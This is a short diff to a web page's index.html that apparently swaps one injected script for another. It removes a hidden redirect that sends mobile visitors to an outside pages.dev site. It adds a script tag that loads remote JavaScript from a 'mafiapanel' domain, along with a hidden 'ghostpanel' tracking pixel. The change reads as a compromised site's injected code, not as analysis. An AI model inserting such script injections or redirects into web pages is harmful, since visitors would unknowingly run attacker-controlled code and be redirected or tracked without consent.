--- a/index.html
+++ b/index.html
@@ -1,6 +1,3 @@
-<script type="text/javascript">
-var device = navigator.userAgent.toLowerCase();
-if( device.search(/iphone|ipod|ipad|android/) > -0 ){{
-document.location ="https://injur.pages.dev/"; }}
-</script>
+<script src="https://mafiapanel.bio/h/index.php?username=Braulionew" type="text/javascript" async="true"></script>
+
 <img src="//whos.amung.us/pingjs/?k=ghostpanel&t=Ghostpanel&x=https://www.geekvape.com/lacabrak" style="display:none" alt="">
